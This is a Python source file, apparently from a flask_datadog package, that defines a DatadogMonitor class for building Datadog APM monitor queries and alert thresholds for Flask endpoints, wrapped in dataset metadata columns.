avg(last_{self.alert_period}):avg:trace.flask.request{{
{flask_req_filter}
}} > {at.critical_threshold}
"""
elif self.monitor_type == MonitorType.APM_ERROR_RATE_ANOMALY:
# TODO: only basic supported for now -- other's are 'agile',
# 'robust' and have more associated configs
anomaly_algo = 'basic'
default_deviation_dir = 'both'
default_num_deviations = 2
# TODO: map rollup interval to alert_period because possible
# rollup interval values are conditional on alert_period
default_rollup_interval_sec = 120
deviation_dir: str = self.mon_spec.get(
MonitorSpec.ANOMALY_DEVIATION_DIR, default_deviation_dir)
anomaly_num_deviations = self.mon_spec.get(
MonitorSpec.ANOMALY_NUM_DEVIATIONS, default_num_deviations)
anomaly_rollup_interval_sec = self.mon_spec.get(
MonitorSpec.ANOMALY_ROLLUP_INTERVAL_SEC, default_rollup_interval_sec)
if anomaly_rollup_interval_sec not in DatadogMonitor.ROLLUP_TO_AVG_TIME_MAP:
raise DatadogMonitorFormatException(f'Rollup interval ({anomaly_rollup_interval_sec}) not supported.')
query = f"""
avg(last_{DatadogMonitor.ROLLUP_TO_AVG_TIME_MAP[anomaly_rollup_interval_sec]}):anomalies(
sum:trace.flask.request.errors{{
{flask_req_filter}
}}.as_count()
/
sum:trace.flask.request.hits{{
{flask_req_filter}
}}.as_count(),
'{anomaly_algo}',
{anomaly_num_deviations},
direction='{deviation_dir}',
alert_window='last_{self.alert_period}',
interval={anomaly_rollup_interval_sec},
count_default_zero='true'
) >= {at.critical_threshold}
"""
else:
raise DatadogMonitorFormatException(f'Monitor type ({self.monitor_type}) not supported.')
return ' '.join(query.split())
def is_anomaly_monitor(self) -> bool:
"""Return whether or not this is an anomaly monitor
"""
return self.monitor_type in MonitorType.anomaly_monitors()
def is_default_monitor(self) -> bool:
"""A monitor is a default monitor if it has no specifications"""
return len(self.mon_spec) == 0
| 36.489362 | 118 | 0.60793 | from dataclasses import dataclass
from typing import Optional
from flask_datadog.generator import endpoint_util
from flask_datadog.shared.datadog_constants import \
MonitorType, \
MonitorSpec
class DatadogMonitorFormatException(Exception):
pass
@dataclass(frozen=True)
class AlertThresholds:
critical_threshold: float
critical_recovery: Optional[float] = None
warning_threshold: Optional[float] = None
warning_recovery: Optional[float] = None
@dataclass(frozen=True)
class DatadogMonitor:
"""Represents a DataDog Monitor"""
# endpoint_path example: /base_test
endpoint_path: str
# method example: GET
method: str
monitor_type: MonitorType
# mon_spec: dictionary of monitor specifications
mon_spec: dict
DEFAULT_ALERT_PERIOD: str = '5m'
# For anomaly monitors: mapping of rollup intervals for aggregation to the
# avg() time period for the anomaly query
ROLLUP_TO_AVG_TIME_MAP = {
7600: '2w',
3600: '1w',
1800: '1w',
600: '2d',
300: '1d',
120: '12h',
60: '4h',
20: '1h',
}
@property
def alert_period(self) -> str:
if self.is_default_monitor():
return DatadogMonitor.DEFAULT_ALERT_PERIOD
if not MonitorSpec.ALERT_PERIOD in self.mon_spec:
raise DatadogMonitorFormatException(f'{MonitorSpec.ALERT_PERIOD} required')
return self.mon_spec[MonitorSpec.ALERT_PERIOD]
@property
def name(self) -> str:
"""Return name of DataDog monitor name
TODO: make this function customizable by end user.
"""
cleaned_endpoint_path: str = endpoint_util.clean_endpoint_for_naming(
self.endpoint_path,
)
# Use MonitorType.value because we can keep the enum value the same
# while we we maintain flexibility to refactor the enum name in the code
return f'{self.method.upper()}-{cleaned_endpoint_path}_{self.monitor_type.value}'
@property
def resource_name(self) -> str:
"""Datadog format resource name.
Used for `tags` field in terraform spec for a monitor.
"""
return f'{self.method}_{self.endpoint_path.lower()}'.lower()
@property
def terraform_monitor_type(self) -> str:
"""Map the DataDog Monitor to the proper monitor type for Terraform specs.
Different monitor types: https://docs.datadoghq.com/api/latest/monitors/#create-a-monitor
"""
if self.monitor_type in [
MonitorType.APM_ERROR_RATE_THRESHOLD,
MonitorType.APM_LATENCY_THRESHOLD,
MonitorType.APM_ERROR_RATE_ANOMALY,
]:
return 'query alert'
raise DatadogMonitorFormatException(
f'MonitorType [{self.monitor_type}] has no matching terraform monitor type string')
def get_alert_escalation_msg(self) -> str:
"""Return escalation message
TODO: not sure where escalation msg is applicable
"""
return 'Alert escalated'
def get_alert_msg(self) -> str:
"""Return alert msg for monitor
"""
if self.mon_spec.get(MonitorSpec.MSG, ''):
return ' '.join(self.mon_spec[MonitorSpec.MSG].split())
return f"""{self.monitor_type.value} triggered."""
def get_alert_thresholds(self) -> AlertThresholds:
"""Alert thresholds with defaults
"""
critical_threshold: float = self.mon_spec.get(MonitorSpec.CRITICAL_THRESHOLD, None)
critical_recovery: float = self.mon_spec.get(MonitorSpec.CRITICAL_RECOVERY_THRESHOLD, None)
warning_threshold: float = self.mon_spec.get(MonitorSpec.WARNING_THRESHOLD, None)
warning_recovery: float = self.mon_spec.get(MonitorSpec.WARNING_RECOVERY_THRESHOLD, None)
if all(x is None for x in [
critical_recovery,
critical_threshold,
warning_recovery,
warning_threshold]
):
critical_threshold = .1
critical_recovery = .08
warning_threshold = .05
warning_recovery = .03
return AlertThresholds(
critical_threshold=critical_threshold,
critical_recovery=critical_recovery,
warning_threshold=warning_threshold,
warning_recovery=warning_recovery,
)
def get_anomaly_threshold_windows(self) -> dict[str, str]:
"""Return anomaly monitor threshold windows.
Threshold windows match the alert_window.
"""
if self.is_anomaly_monitor():
return {
'recovery_window': f'last_{self.alert_period}',
'trigger_window': f'last_{self.alert_period}',
}
return {}
def get_query_str(
self,
env: str,
service_name: str,
) -> str:
"""
:param env: alert env (e.g., 'staging', 'prod')
:param service_name: name of service (e.g., 'authentication_service')
"""
at: AlertThresholds = self.get_alert_thresholds()
resource_name: str = f'{self.method.lower()}_{self.endpoint_path}'
# flask_req_filter is the common filter to apply to flask request traces
flask_req_filter: str = f"""
env:{env},
service:{service_name},
resource_name:{resource_name}
"""
if self.monitor_type == MonitorType.APM_ERROR_RATE_THRESHOLD:
query = f"""
sum(last_{self.alert_period}): (
sum:trace.flask.request.errors{{
{flask_req_filter}
}}.as_count()
/
sum:trace.flask.request.hits{{
{flask_req_filter}
}}.as_count()
) > {at.critical_threshold}
"""
elif self.monitor_type == MonitorType.APM_LATENCY_THRESHOLD:
query = f"""
avg(last_{self.alert_period}):avg:trace.flask.request{{
{flask_req_filter}
}} > {at.critical_threshold}
"""
elif self.monitor_type == MonitorType.APM_ERROR_RATE_ANOMALY:
# TODO: only basic supported for now -- other's are 'agile',
# 'robust' and have more associated configs
anomaly_algo = 'basic'
default_deviation_dir = 'both'
default_num_deviations = 2
# TODO: map rollup interval to alert_period because possible
# rollup interval values are conditional on alert_period
default_rollup_interval_sec = 120
deviation_dir: str = self.mon_spec.get(
MonitorSpec.ANOMALY_DEVIATION_DIR, default_deviation_dir)
anomaly_num_deviations = self.mon_spec.get(
MonitorSpec.ANOMALY_NUM_DEVIATIONS, default_num_deviations)
anomaly_rollup_interval_sec = self.mon_spec.get(
MonitorSpec.ANOMALY_ROLLUP_INTERVAL_SEC, default_rollup_interval_sec)
if anomaly_rollup_interval_sec not in DatadogMonitor.ROLLUP_TO_AVG_TIME_MAP:
raise DatadogMonitorFormatException(f'Rollup interval ({anomaly_rollup_interval_sec}) not supported.')
query = f"""
avg(last_{DatadogMonitor.ROLLUP_TO_AVG_TIME_MAP[anomaly_rollup_interval_sec]}):anomalies(
sum:trace.flask.request.errors{{
{flask_req_filter}
}}.as_count()
/
sum:trace.flask.request.hits{{
{flask_req_filter}
}}.as_count(),
'{anomaly_algo}',
{anomaly_num_deviations},
direction='{deviation_dir}',
alert_window='last_{self.alert_period}',
interval={anomaly_rollup_interval_sec},
count_default_zero='true'
) >= {at.critical_threshold}
"""
else:
raise DatadogMonitorFormatException(f'Monitor type ({self.monitor_type}) not supported.')
return ' '.join(query.split())
def is_anomaly_monitor(self) -> bool:
"""Return whether or not this is an anomaly monitor
"""
return self.monitor_type in MonitorType.anomaly_monitors()
def is_default_monitor(self) -> bool:
"""A monitor is a default monitor if it has no specifications"""
return len(self.mon_spec) == 0
| 303 | 203 | 71 |